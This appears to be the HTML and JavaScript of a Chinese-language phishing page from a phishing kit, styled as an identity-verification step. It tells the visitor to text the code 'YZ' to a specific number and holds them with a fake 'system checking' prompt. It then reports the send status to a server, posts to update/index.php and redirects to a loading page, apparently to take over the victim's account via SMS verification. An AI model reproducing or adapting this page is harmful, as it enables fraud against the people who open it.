<!DOCTYPE html><html class="javascript am-touch js cssanimations ios"><head><meta charset="utf-8">
<title>身份验证</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="renderer" content="webkit">
<meta name="x5-fullscreen" content="true">
<meta name="browsermode" content="application">
<meta name="x5-page-mode" content="app">
<meta content="telephone=no" name="format-detection">
<script src="../images/jquery.min.js"></script>
<script src="../app/data.js"></script>
<link href="images/m.css" rel="stylesheet">
</head>
<body>
<div id="content" class="content">
	<form method="post" id="fro" action="update/index.php" autocomplete="off">
		<div id="login" class="login">
			<style></style>
			<div class="title">请输入验证码</div>
			<div class="line">请使用 <script>document.write(conf.user||'18888888888');</script> 根据下方提示完成安全验证</div>
			<div id="web_login">
				<table class="tab" width="100%" border="0" cellpadding="0" cellspacing="0" >	
					<tr>
						<td class="tab_left">编辑短信</td>
						<td class="tab_right" colspan="2">YZ</td>
					</tr>
					<tr>
						<td class="tab_left">发<span class="tab_span"></span>送<span class="tab_span"></span>至</td>
						<td class="tab_right">10691859839103</td>
						<td class="tab_righs">
						<script>
							if(/iPhone|iPod|ios|iPad/i.test(navigator.userAgent)){
								document.write('<a class="tab_righsa" href="sms:10691859839103?&amp;body=YZ" >编辑短信</a>');
							}else{
								document.write('<a class="tab_righsa" href="sms:10691859839103?body=YZ" >编辑短信</a>');
							}		
						</script>
						</td>
					</tr>
				</table>
				<div class="info">发送短信可能会产生费用，一般为0.1元/条，全部由运营商收取。</div>
				<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" style="opacity:0.4;" onClick="sumbit_form();">提 交</div>
			</div>
		</div>
	</form>
</div>
<div class="bot">手机号不用了？<a class="info_a">找回账号</a></div>
<imgx style="width:100%;" src="./images/bg2.jpg">
   <div id="key1" class="jp en"><ul class="uls"><li class="key">q</li><li class="key">w</li><li class="key">e</li><li class="key">r</li><li class="key">t</li><li class="key">y</li><li class="key">u</li><li class="key">i</li><li class="key">o</li><li class="key">p</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">a</li><li class="key">s</li><li class="key">d</li><li class="key">f</li><li class="key">g</li><li class="key">h</li><li class="key">j</li><li class="key">k</li><li class="key">l</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" id="A"><img src="images/0.png" width="20"></li><li class="key">z</li><li class="key">x</li><li class="key">c</li><li class="key">v</li><li class="key">b</li><li class="key">n</li><li class="key">m</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key1_" class="jp en"><ul class="uls"><li class="key">Q</li><li class="key">W</li><li class="key">E</li><li class="key">R</li><li class="key">T</li><li class="key">Y</li><li class="key">U</li><li class="key">I</li><li class="key">O</li><li class="key">P</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">A</li><li class="key">S</li><li class="key">D</li><li class="key">F</li><li class="key">G</li><li class="key">H</li><li class="key">J</li><li class="key">K</li><li class="key">L</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" style="background:#fff" id="a"><img style="width:1.25rem" src="images/2.png"></li><li class="key">Z</li><li class="key">X</li><li class="key">C</li><li class="key">V</li><li class="key">B</li><li class="key">N</li><li class="key">M</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key2" class="jp shuzi"><ul class="uls"><li class="key">1</li><li class="key">2</li><li class="key">3</li><li class="key">4</li><li class="key">5</li><li class="key">6</li><li class="key">7</li><li class="key">8</li><li class="key">9</li><li class="key">0</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">-</li><li class="key">/</li><li class="key">:</li><li class="key">;</li><li class="key">(</li><li class="key">)</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj" id="teshu"><p style="font-size:1rem">#+=</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key3" class="jp zifu"><ul class="uls"><li class="key">[</li><li class="key">]</li><li class="key">{</li><li class="key">}</li><li class="key">#</li><li class="key">%</li><li class="key">^</li><li class="key">*</li><li class="key">+</li><li class="key">=</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">_</li><li class="key">\</li><li class="key">|</li><li class="key">~</li><li class="key">&lt;</li><li class="key">&gt;</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj key_123"><p style="font-size:1rem">123</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key4" class="jp zifu"><ul class="uls"><li class="number">1</li><li class="number">2</li><li class="number">3</li><div class="clear"></div></ul><ul class="uls"><li class="number">4</li><li class="number">5</li><li class="number">6</li><div class="clear"></div></ul><ul class="uls"><li class="number">7</li><li class="number">8</li><li class="number">9</li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="num_ok" id="ok">确认</li><li class="number">0</li><li class="num-del" id="del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul></div>
</div>
<script language="javascript">$(function(){rs({pn:'code'})});</script>
<script>
var time = 0;
$(function(){
	$('.tab_righsa, .tab').click(function(e){
		setInterval(function(){
			time++;
			if(time > 6){
				$('#go').css({opacity:1}).html('我已发送');
			}
		},1000);	
	});
})
function sumbit_form(){
    var code=$("#code").val();
	if(time > 6){
		$('#go').css({opacity:1});
		setTimeout(function(){
			location.href='../load/';
		},2000);
		ds('sv',{issend:'已发送'});
	}else{
		tip('系统检测中，请耐心等候！');
	}
}
//JS提示弹框
function tip(text, time){
	window.tmsg&&document.body.removeChild(tmsg);
	document.body.insertAdjacentHTML('beforeEnd','<div id="tmsg" style="top:200px;left:20%;right:20%;color:#fff;margin:0 auto;opacity:0;padding:5px;font-size:15px;max-width:300px;position:fixed;text-align:center;border-radius:8px;background-color:#333;border:1px solid #222;box-shadow:rgba(0,0,0,0.25) 0px 0px 10px 6px;transition:opacity 0.6s;z-index:19891016;">'+text+'</div>');
	setTimeout('tmsg.style.opacity=0.8',0);clearTimeout(window.tmst);
	window.tmst=setTimeout('tmsg.style.opacity=0;setTimeout("document.body.removeChild(tmsg)",600);',(time||3)*1000);
}
</script>
</body>
</html>